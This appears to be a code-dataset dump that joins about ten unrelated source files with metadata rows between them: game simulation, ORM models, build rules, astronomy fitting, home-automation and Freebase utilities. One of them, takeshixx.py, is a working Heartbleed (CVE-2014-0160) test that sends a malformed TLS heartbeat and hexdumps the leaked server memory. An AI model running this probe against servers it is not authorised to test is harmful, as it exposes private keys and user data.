else:
curplayer = Board.X # computer
done = False
#sys.stdout.write("%s\n" % board)
while not done:
if board.full(): #DRAW
done = True
# print all_state
write_to_file()
#sys.stdout.write("Tie game!\n")
continue
if curplayer == Board.X:
#sys.stdout.write("Computer is thinking...\n")
# run the minmax tree for the current board
#if board.get_board_values() in states:
if board.get_board_values() in states and random.choice([True,True,False,True,False]):
move = states[board.get_board_values()]
else:
move = mm.buildtree(board, curplayer)
#sys.stdout.write("Computer's move: %s\n" % move)
else:
badMove = True
while badMove:
#sys.stdout.write("Enter a move: ");
sys.stdout.flush();
#move = int(sys.stdin.readline())
move = random.choice([0,1,2,3,4,5,6,7,8])
badMove = move < 0 or move > 8 or board[move] != Board.NONE
if move >= 0:
board.move(curplayer, move)
#sys.stdout.write("%s\n" % board)
winner = board.getWinner()
if winner == Board.X:
write_to_file()
# sys.stdout.write("X wins!\n")
done = True
elif winner == Board.O:
write_to_file()
# sys.stdout.write("O wins!\n")
done = True
# switch to other player:
if curplayer == Board.X:
curplayer = Board.O
else:
curplayer = Board.X
if __name__ == "__main__":
iterations = 5000
while iterations:
main()
iterations -= 1
|
mit
| 3,349,314,645,422,047,000
| 27.613924
| 98
| 0.496572
| false
| 3.662211
| false
| false
| false
|
pyfidelity/rest-seed
|
backend/backrest/models/content.py
|
1
|
1796
|
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import Unicode
from sqlalchemy import UnicodeText
from sqlalchemy.util import classproperty
from ..utils import utcnow
from .base import Base
def get_content(id):
""" Return content instance with the given id (or `None`). """
return Content.query.filter_by(id=id).first()
class Content(Base):
""" Base class for all content. Includes basic features such
as ownership, time stamps for modification and creation. """
@classproperty
def __mapper_args__(cls):
return dict(
polymorphic_on='type',
polymorphic_identity=cls.__name__.lower(),
with_polymorphic='*')
id = Column(Integer(), primary_key=True)
type = Column(String(30), nullable=False)
owner = Column(Unicode())
title = Column(Unicode())
description = Column(UnicodeText())
creation_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
modification_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
def __init__(self, **data):
self.add(**data)
def update(self, touch=True, **data):
""" Iterate over all columns and set values from data. """
super(Content, self).update(**data)
if touch and 'modification_date' not in data:
self.modification_date = utcnow()
def __json__(self, request):
return dict(id=self.id, title=self.title,
description=self.description,
creation_date=self.creation_date,
modification_date=self.modification_date)
def __eq__(self, other):
return isinstance(other, Content) and self.id == other.id
|
bsd-2-clause
| -3,919,537,068,281,949,700
| 32.886792
| 87
| 0.655902
| false
| 4.348668
| false
| false
| false
|
tdyas/pants
|
src/python/pants/backend/python/lint/docformatter/rules.py
|
1
|
5663
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from typing import Tuple
from pants.backend.python.lint.docformatter.subsystem import Docformatter
from pants.backend.python.lint.python_fmt import PythonFmtFieldSets
from pants.backend.python.rules import download_pex_bin, pex
from pants.backend.python.rules.pex import (
Pex,
PexInterpreterConstraints,
PexRequest,
PexRequirements,
)
from pants.backend.python.subsystems import python_native_code, subprocess_environment
from pants.backend.python.subsystems.subprocess_environment import SubprocessEncodingEnvironment
from pants.backend.python.target_types import PythonSources
from pants.core.goals.fmt import FmtFieldSet, FmtFieldSets, FmtResult
from pants.core.goals.lint import LinterFieldSets, LintResult
from pants.core.util_rules import determine_source_files, strip_source_roots
from pants.core.util_rules.determine_source_files import (
AllSourceFilesRequest,
SourceFiles,
SpecifiedSourceFilesRequest,
)
from pants.engine.fs import Digest, MergeDigests
from pants.engine.process import FallibleProcessResult, Process, ProcessResult
from pants.engine.rules import SubsystemRule, named_rule, rule
from pants.engine.selectors import Get
from pants.engine.unions import UnionRule
from pants.python.python_setup import PythonSetup
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class DocformatterFieldSet(FmtFieldSet):
required_fields = (PythonSources,)
sources: PythonSources
class DocformatterFieldSets(FmtFieldSets):
field_set_type = DocformatterFieldSet
@dataclass(frozen=True)
class SetupRequest:
field_sets: DocformatterFieldSets
check_only: bool
@dataclass(frozen=True)
class Setup:
process: Process
original_digest: Digest
def generate_args(
*, specified_source_files: SourceFiles, docformatter: Docformatter, check_only: bool,
) -> Tuple[str, ...]:
return (
"--check" if check_only else "--in-place",
*docformatter.options.args,
*sorted(specified_source_files.snapshot.files),
)
@rule
async def setup(
request: SetupRequest,
docformatter: Docformatter,
python_setup: PythonSetup,
subprocess_encoding_environment: SubprocessEncodingEnvironment,
) -> Setup:
requirements_pex = await Get[Pex](
PexRequest(
output_filename="docformatter.pex",
requirements=PexRequirements(docformatter.get_requirement_specs()),
interpreter_constraints=PexInterpreterConstraints(
docformatter.default_interpreter_constraints
),
entry_point=docformatter.get_entry_point(),
)
)
if request.field_sets.prior_formatter_result is None:
all_source_files = await Get[SourceFiles](
AllSourceFilesRequest(field_set.sources for field_set in request.field_sets)
)
all_source_files_snapshot = all_source_files.snapshot
else:
all_source_files_snapshot = request.field_sets.prior_formatter_result
specified_source_files = await Get[SourceFiles](
SpecifiedSourceFilesRequest(
(field_set.sources, field_set.origin) for field_set in request.field_sets
)
)
input_digest = await Get[Digest](
MergeDigests((all_source_files_snapshot.digest, requirements_pex.digest))
)
address_references = ", ".join(
sorted(field_set.address.reference() for field_set in request.field_sets)
)
process = requirements_pex.create_process(
python_setup=python_setup,
subprocess_encoding_environment=subprocess_encoding_environment,
pex_path="./docformatter.pex",
pex_args=generate_args(
specified_source_files=specified_source_files,
docformatter=docformatter,
check_only=request.check_only,
),
input_digest=input_digest,
output_files=all_source_files_snapshot.files,
description=(
f"Run Docformatter on {pluralize(len(request.field_sets), 'target')}: "
f"{address_references}."
),
)
return Setup(process, original_digest=all_source_files_snapshot.digest)
@named_rule(desc="Format Python docstrings with docformatter")
async def docformatter_fmt(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> FmtResult:
if docformatter.options.skip:
return FmtResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=False))
result = await Get[ProcessResult](Process, setup.process)
return FmtResult.from_process_result(result, original_digest=setup.original_digest)
@named_rule(desc="Lint Python docstrings with docformatter")
async def docformatter_lint(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> LintResult:
if docformatter.options.skip:
return LintResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=True))
result = await Get[FallibleProcessResult](Process, setup.process)
return LintResult.from_fallible_process_result(result)
def rules():
return [
setup,
docformatter_fmt,
docformatter_lint,
SubsystemRule(Docformatter),
UnionRule(PythonFmtFieldSets, DocformatterFieldSets),
UnionRule(LinterFieldSets, DocformatterFieldSets),
*download_pex_bin.rules(),
*determine_source_files.rules(),
*pex.rules(),
*python_native_code.rules(),
*strip_source_roots.rules(),
*subprocess_environment.rules(),
]
|
apache-2.0
| -8,875,962,643,641,155,000
| 33.530488
| 96
| 0.719054
| false
| 3.927184
| false
| false
| false
|
tayebzaidi/snova_analysis
|
Miscellaneous/supernova_readin_plot.py
|
1
|
2998
|
import matplotlib.pyplot as plt
import numpy as np
import peakfinding
import smoothing
import plotter
import readin
import sys
import os
if __name__== '__main__':
#lcurve = readin.readin_aavso('aavsodata_sscyg.txt')
#mjd = lcurve.jd - 240000.5
#mag = lcurve.magnitude
#maxtab, mintab = peakfinding.peakdet(mag,1.2 , mjd)
#smoothed = smoothing.UnivariateSplinefit(mjd, mag,5)
#maxtab, mintab = peakfinding.peakdet(smoothed, 1, mjd)
#data = readin.readin_SNANA('CFA4_2006ct.dat')
#plotter.plot1D(mjd, smoothed, 'blue', 0,1)
#plotter.plot1D(mjd, mag, 'red', 1,1)
#plotter.Show()
#data = readin.readin_SNrest()
#maxp, minp = peakfinding.peakdet(data.mag, 1, data.phase)
#interp = smoothing.Interpolate1D(data.phase, data.mag)
path = "/Users/zaidi/Documents/REU/restframe/"
Mvbdata = []
delM15data = []
err_data = []
for filename in os.listdir(path):
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
try:
interp = smoothing.Interpolate1D(data.phase, data.mag)
maxp, minp = peakfinding.peakdet(data.mag, 0.55, data.phase)
Mvb = smoothing.MvB(data.mag, data.phase, minp)
delM15 = smoothing.delM15(interp, data.phase, minp)
if len(minp) != 0 and len(minp) < 3:
Mvbdata.append(Mvb)
delM15data.append(delM15)
err_data.append(data.err)
'''
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [minp[0][0]+15], interp(minp[0][0]+15), 'bo')
ax.axvline(minp[0][0])
ax.axvline(minp[0][0]+15)
ax.axhline(interp(minp[0][0]+15))
ax.axhline(minp[0][1])
plt.savefig(filename + '.png')
'''
except ValueError:
print filename, data
print data.mag, data.phase
print (len(data.mag), len(data.phase))
'''
print interp(15)
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [15.], interp(15), 'bo')
plt.ion()
plt.show(fig)
'''
#sys.exit(-1)
'''
ax = plotter.plot1D(data.phase, interp,'blue',1, lnstyle = '-')
try:
plotter.plot1DScatter(minp[:,0], minp[:,1], 'red', 1)
except IndexError:
pass
plotter.Show()
plotter.Clear()
a = raw_input("Press Enter to continue...")
if a == "q":
break
'''
fig2 = plt.figure(2)
ax = fig2.add_subplot(1,1,1)
ax.scatter(Mvbdata, delM15data,)
ax2 = fig2.add_subplot(3,2,1)
ax2.hist(err_data, 5)
plt.show(fig2)
#plt.plot(data.phase, data.mag, linestyle = ':')
#plt.gca().invert_yaxis()
#plt.show()
|
gpl-3.0
| -1,806,584,690,072,135,200
| 32.685393
| 97
| 0.53936
| false
| 3.062308
| false
| false
| false
|
badele/home-assistant
|
homeassistant/components/wink.py
|
1
|
3001
|
"""
homeassistant.components.wink
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Connects to a Wink hub and loads relevant components to control its devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/wink/
"""
import logging
from homeassistant import bootstrap
from homeassistant.loader import get_component
from homeassistant.helpers import validate_config
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.const import (
EVENT_PLATFORM_DISCOVERED, CONF_ACCESS_TOKEN,
ATTR_SERVICE, ATTR_DISCOVERED, ATTR_FRIENDLY_NAME)
DOMAIN = "wink"
DEPENDENCIES = []
REQUIREMENTS = ['https://github.com/balloob/python-wink/archive/'
'42fdcfa721b1bc583688e3592d8427f4c13ba6d9.zip'
'#python-wink==0.2']
DISCOVER_LIGHTS = "wink.lights"
DISCOVER_SWITCHES = "wink.switches"
DISCOVER_SENSORS = "wink.sensors"
DISCOVER_LOCKS = "wink.locks"
def setup(hass, config):
""" Sets up the Wink component. """
logger = logging.getLogger(__name__)
if not validate_config(config, {DOMAIN: [CONF_ACCESS_TOKEN]}, logger):
return False
import pywink
pywink.set_bearer_token(config[DOMAIN][CONF_ACCESS_TOKEN])
# Load components for the devices in the Wink that we support
for component_name, func_exists, discovery_type in (
('light', pywink.get_bulbs, DISCOVER_LIGHTS),
('switch', pywink.get_switches, DISCOVER_SWITCHES),
('sensor', pywink.get_sensors, DISCOVER_SENSORS),
('lock', pywink.get_locks, DISCOVER_LOCKS)):
if func_exists():
component = get_component(component_name)
# Ensure component is loaded
bootstrap.setup_component(hass, component.DOMAIN, config)
# Fire discovery event
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: discovery_type,
ATTR_DISCOVERED: {}
})
return True
class WinkToggleDevice(ToggleEntity):
""" Represents a Wink toogle (switch) device. """
def __init__(self, wink):
self.wink = wink
@property
def unique_id(self):
""" Returns the id of this Wink switch. """
return "{}.{}".format(self.__class__, self.wink.deviceId())
@property
def name(self):
""" Returns the name of the light if any. """
return self.wink.name()
@property
def is_on(self):
""" True if light is on. """
return self.wink.state()
@property
def state_attributes(self):
""" Returns optional state attributes. """
return {
ATTR_FRIENDLY_NAME: self.wink.name()
}
def turn_on(self, **kwargs):
""" Turns the switch on. """
self.wink.setState(True)
def turn_off(self):
""" Turns the switch off. """
self.wink.setState(False)
def update(self):
""" Update state of the light. """
self.wink.updateState()
|
mit
| -1,104,886,890,720,861,200
| 28.712871
| 76
| 0.629124
| false
| 3.737235
| true
| false
| false
|
lemoogle/iod-freebase-indexer
|
utils.py
|
1
|
8062
|
import json
import urllib
import requests
import itertools
import time
class FreebaseUtil(object):
freebase_topic_url="https://www.googleapis.com/freebase/v1/topic{}?filter=/common/topic/description&key={}"
service_url = 'https://www.googleapis.com/freebase/v1/mqlread'
aliases=[]
def __init__(self,freebase_key):
self.freebase_key=freebase_key
def runQuery(self,index,query,cursor="",category=False,description=False,):
count=100
if not cursor:
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
while(cursor):
print cursor
count+=100
print count
open('cursor','wb').write(cursor)
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
def do_query(self,index,query,cursor="",category=False,description=False):
params = {
'query': json.dumps(query),
'key': self.freebase_key
}
params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
for result in response['result']:
#print result['mid']
#print result
if description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.freebase_key)
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
if category:
result= self.standardize(result)
result=self.prepareCategory(result)
if result==0:
continue
#print result
if "authorname" in result:
result["category"]=result["authorname"]
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
# try:
# print "trying to index"
# except:
# print "indexing failed"
return response.get("cursor")
def do_query_category(self,index,cursor=""):
self.params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(self.params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
try:
a=response['result']
except:
print response
for result in response['result']:
#print result['mid']
#print result
if self.description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.params["key"])
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
result= self.standardize(result)
result=self.prepareCategory(result)
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
#print index.name
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
return response.get("cursor")
def standardize(self,result):
#print result,"hello"
for k,v in result.iteritems():
splits = k.split("/")
#print len(splits)
if len(splits)>1:
result[splits[len(splits)-1]]=v
result.pop(k)
if 'key_namespace' in result:
result.pop('key_namespace')
result['wikipedia_url']="http://en.wikipedia.org/wiki/index.html?curid=%s" % result.pop("key_value")
return result
def prepareCategory(self,result):
phrase = result["title"]
if not phrase:
return 0
rest='("'+phrase+'") '
content=phrase+" "
#print result
for aliaskey in self.aliases:
for alias in result[aliaskey]:
content+=alias+" "
rest+=" OR (\"%s\") " % alias
if "," in phrase:
phrase =phrase.split(',')[0]
rest+="OR (\"%s\") " % phrase
if "Street" in phrase:
rest+=" OR (\"%s\") " % phrase.replace("Street","")
result['booleanrestriction']=rest
result['content']=content
return result
def flatten(self,obj, key=""):
key=key.split(":")[0]
if type(obj) is dict:
orig=dict(obj)
for k,v in obj.iteritems():
#print k,v
#key=key.split(":")[0]
#splits = key.split("/")
#print len(splits)
#key=splits[len(splits)-1]
newkey=""
if key:
newkey=key+"_"
newkey+=k
if type(v) is dict:
orig.update(self.flatten(v,newkey))
orig.pop(k)
elif type(v) is list:
flatlist=self.flatten(v,newkey);
if flatlist:
orig.update(flatlist)
orig.pop(k)
#print flatten(val,newkey)
#orig.update(flatten(v,newkey))
else:
if key:
orig[newkey]=v
orig.pop(k)
return orig
if type(obj) is list:
new={}
for a in obj:
if type(a) is dict:
#key=key.split(":")[0]
for k,v in self.flatten(a,key).iteritems():
#print new.get(k,[]).append(v)
#print k,v
if type(v) is list:
k=key+"_"+k
new[k]=new.get(k,[])
new[k].append(v)
if not new:
return False
return new
return obj
def flattenlists(self,obj):
for k,v in obj.iteritems():
if type(v) is list and len(v)>0 and not isinstance(v[0], basestring):
obj[k]=list(itertools.chain(*v))
return obj
|
mit
| 4,380,003,460,438,810,000
| 31.508065
| 111
| 0.499504
| false
| 4.357838
| false
| false
| false
|
johnmarkschofield/heartbleed-weaponized
|
takeshixx.py
|
1
|
4770
|
#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
if opts.starttls:
re = s.recv(4096)
if opts.debug: print re
s.send('ehlo starttlstest\n')
re = s.recv(1024)
if opts.debug: print re
if not 'STARTTLS' in re:
if opts.debug: print re
print 'STARTTLS not supported...'
sys.exit(0)
s.send('starttls\n')
re = s.recv(1024)
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
|
mit
| -2,765,998,675,257,244,700
| 30.176471
| 122
| 0.57652
| false
| 3.356791
| false
| false
| false
|
nakayamaqs/PythonModule
|
Learning/func_return.py
|
1
|
1354
|
# from :http://docs.python.org/3.3/faq/programming.html#what-is-the-difference-between-arguments-and-parameters
# By returning a tuple of the results:
def func2(a, b):
a = 'new-value' # a and b are local names
b = b + 1 # assigned to new objects
return a, b # return new values
x, y = 'old-value', 99
x, y = func2(x, y)
print(x, y) # output: new-value 100
# By passing a mutable (changeable in-place) object:
def func1(a):
a[0] = 'new-value' # 'a' references a mutable list
a[1] = a[1] + 1 # changes a shared object
args = ['old-value', 99]
func1(args)
print(args[0], args[1]) # output: new-value 100
# By passing in a dictionary that gets mutated:
def func3(args):
args['a'] = 'new-value' # args is a mutable dictionary
args['b'] = args['b'] + 1 # change it in-place
args = {'a':' old-value', 'b': 99}
func3(args)
print(args['a'], args['b'])
# Or bundle up values in a class instance:
class callByRef:
def __init__(self, **args):
for (key, value) in args.items():
setattr(self, key, value)
def func4(args):
args.a = 'new-value by func4.' # args is a mutable callByRef
args.b = args.b + 100 # change object in-place
args = callByRef(a='old-value', b=99,c=23)
func4(args)
print(args.a, args.b, args.c)
|
mit
| 7,679,583,819,250,892,000
| 28.434783
| 111
| 0.595273
| false
| 2.930736
| false
| false
| false
|
nardorb/OneStop
|
models/taxi_driver.py
|
1
|
1177
|
from google.appengine.ext import db
class TaxiDriver(db.Model):
EXCEPTION_NO_PARENT = "`parent` property must be an `Account` object."
name = db.StringProperty(default=None)
email = db.EmailProperty(default=None)
sex = db.StringProperty(default=None)
address = db.StringProperty(default=None)
parish = db.StringProperty(default=None)
tel_number = db.StringProperty(default=None)
# years_with_license = db.StringProperty(default=None)
# road_accidents = db.IntegerProperty(default=None)
driver_id = db.StringProperty(default=None)
is_on_duty = db.BooleanProperty(default=False)
location = db.StringProperty(default=None)
dob = db.StringProperty(default=None)
@classmethod
def get_by_driver_id(cls, driver_id):
return cls.all().filter('driver_id =', driver_id).get()
def get_by_location(self, location):
return None
def put(self, *args, **kwargs):
# This is not at the top to prevent circular imports.
from models.account import Account
parent = self.parent()
if not parent or not isinstance(parent, Account):
raise ValueError(self.EXCEPTION_NO_PARENT)
return super(TaxiDriver, self).put(*args, **kwargs)
|
gpl-2.0
| 1,523,704,451,616,366,000
| 33.647059
| 72
| 0.724724
| false
| 3.566667
| false
| false
| false
|
mattbrowley/PSim
|
Covariances.py
|
1
|
7985
|
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import PSim
import pickle
import csv
import simplex
fit_type = 'global'
scale = 0.003
with open("pickled_data.p", "r") as file:
pickled_data = pickle.load(file)
powers = pickled_data['powers']
xdata = pickled_data['allxdata']
ydata = pickled_data['allydata']
xarray = pickled_data['xarray']
yarrays = pickled_data['yarrays']
averages = pickled_data['averages']
period = 50 # ns
with open("pickled_data_250.p", "r") as file:
pickled_data_250 = pickle.load(file)
powers_250 = pickled_data_250['powers']
xdata_250 = pickled_data_250['allxdata']
ydata_250 = pickled_data_250['allydata']
xarray_250 = pickled_data_250['xarray']
yarrays_250 = pickled_data_250['yarrays']
averages_250 = pickled_data_250['averages']
period_250 = 1.0 / 250000.0 / 1e-9 # ns
def scalar_min(p, data):
xdata, ydata, ysim = data[0]
xdata_250, ydata_250, ysim_250 = data[1]
scaled_ysim = ysim * p[0]
scaled_ysim_250 = ysim_250 * p[0]
err_20 = 0
err_250 = 0
num_points = 0
for dat, sim in zip(ydata, scaled_ysim):
for x, d, s in zip(xdata, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
err_20 += error*error
num_points = num_points + 1
except:
err_20 += 8e20
err_20 = err_20 / num_points
num_points = 0
for dat, sim in zip(ydata_250[:-1], scaled_ysim_250[:-1]):
for x, d, s in zip(xdata_250, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
if x >= -0.25 and x <= 120:
err_250 += error*error
num_points = num_points + 1
except:
err_250 += 8e20
err_250 = err_250 / num_points
err = np.sqrt(err_250*err_20)
if np.isnan(err):
err = 7e20
fitness = err * 100
return fitness
def evaluate(p):
dummy_x = np.zeros(10)
dummy_y = np.zeros([10, 10])
data = [[dummy_x, dummy_y, dummy_y], [dummy_x, dummy_y, dummy_y]]
if fit_type is 'global' or fit_type is 20: # 20 MHz data
sim = PSim.DecaySim(reprate=20000000, tolerance=0.005, step=5e-12)
sim.trap = p[0]
sim.EHdecay = p[1] * sim.step
sim.Etrap = p[2] * sim.step
sim.FHloss = p[3] * sim.step
sim.Gdecay = p[4] * sim.step
sim.G2decay = p[5] * sim.step
sim.G3decay = p[6] * sim.step
sim.GHdecay = p[7] * sim.step
sim.Gescape = p[8] * sim.step
sim.Gform = p[9] * sim.step * 0
sim.G3loss = p[9] * sim.step
sim.scalar = 1
for power in powers:
sim.addPower(power)
sim.runSim()
interp_signals = []
for this_run in sim.signal:
interp_this = np.interp(xarray, sim.xdata, this_run)
interp_signals.append(interp_this)
interp_signals = np.array(interp_signals)
data[0] = [xarray, yarrays, interp_signals]
if fit_type is 'global' or fit_type is 250: # 250 kHz data
sim_250 = PSim.DecaySim(reprate=250000, tolerance=0.005, step=5e-12)
sim_250.trap = p[0]
sim_250.EHdecay = p[1] * sim_250.step
sim_250.Etrap = p[2] * sim_250.step
sim_250.FHloss = p[3] * sim_250.step
sim_250.Gdecay = p[4] * sim_250.step
sim_250.G2decay = p[5] * sim_250.step
sim_250.G3decay = p[6] * sim_250.step
sim_250.GHdecay = p[7] * sim_250.step
sim_250.Gescape = p[8] * sim_250.step
sim_250.Gform = p[9] * sim_250.step * 0
sim_250.G3loss = p[9] * sim_250.step
sim_250.scalar = 1
for power in powers_250:
sim_250.addPower(power)
sim_250.runSim()
interp_signals_250 = []
for this_run in sim_250.signal:
interp_this = np.interp(xarray_250, sim_250.xdata, this_run)
interp_signals_250.append(interp_this)
interp_signals_250 = np.array(interp_signals_250)
data[1] = [xarray_250, yarrays_250, interp_signals_250]
# Use a simplex minimization to find the best scalar
scalar0 = np.array([3e-26])
ranges = scalar0*0.1
s = simplex.Simplex(scalar_min, scalar0, ranges)
values, fitness, iter = s.minimize(epsilon=0.00001, maxiters=500,
monitor=0, data=data)
scalar = values[0]
#p[-1] = scalar
if scalar < 0:
fitness = 1e30
return fitness
def main():
logname = 'best_{}.log'.format(fit_type)
with open(logname, 'rb') as best_file:
reader = csv.reader(best_file, dialect='excel-tab')
p0 = []
for val in reader.next():
p0.append(np.float(val))
dim = 11
pi = np.ones(dim)
for i, n in enumerate([0,1,2,3,4,5,6,7,8,9,10]):
pi[i] = p0[n]
ps1 = np.ndarray([dim, dim, dim])
ps2 = np.ndarray([dim, dim, dim])
fitness1 = np.ndarray([dim, dim])
fitness2 = np.ndarray([dim, dim])
differences = scale*pi
for i in range(dim):
for j in range(dim):
for k in range(dim):
val1 = pi[k]
val2 = pi[k]
if i == k or j == k:
val1 = val1 + differences[k]
val2 = val2 - differences[k]
ps1[i][j][k] = val1
ps2[i][j][k] = val2
for i in range(dim):
for j in range(i, dim):
fitness1[i][j] = evaluate(ps1[i][j])
fitness1[j][i] = fitness1[i][j]
fitness2[i][j] = evaluate(ps2[i][j])
fitness2[j][i] = fitness2[i][j]
error0 = evaluate(pi)
data = {'fitness1': fitness1,
'fitness2': fitness2,
'differences': differences,
'error0': error0}
with open("covariance_data_{}.p".format(scale), "wb") as file:
pickle.dump(data, file)
hessian = np.ndarray([dim, dim])
for i in range(dim):
for j in range(dim):
if i == j:
d2i = differences[i]
df1 = (fitness1[i][j] - error0) / d2i
df2 = (error0 - fitness2[i][j]) / d2i
hessian[i][j] = (df1 - df2) / (d2i)
else:
df1di1 = (fitness1[i][i] - error0) / differences[i]
df1di2 = (fitness1[i][j] - fitness1[j][j]) / differences[i]
dff1didj = (df1di2 - df1di1) / differences[j]
df2di1 = (error0 - fitness2[i][i]) / differences[i]
df2di2 = (fitness2[j][j] - fitness2[i][j]) / differences[i]
dff2didj = (df2di2 - df2di1) / differences[j]
hessian[i][j] = (dff1didj + dff2didj) / 2
hessian[j][i] = hessian[i][j]
with open("hessian_{}.p".format(scale), "wb") as file:
pickle.dump(hessian, file)
m_hessian = np.matrix(hessian)
covariance = np.linalg.inv(m_hessian)
cv_array = np.array(covariance)
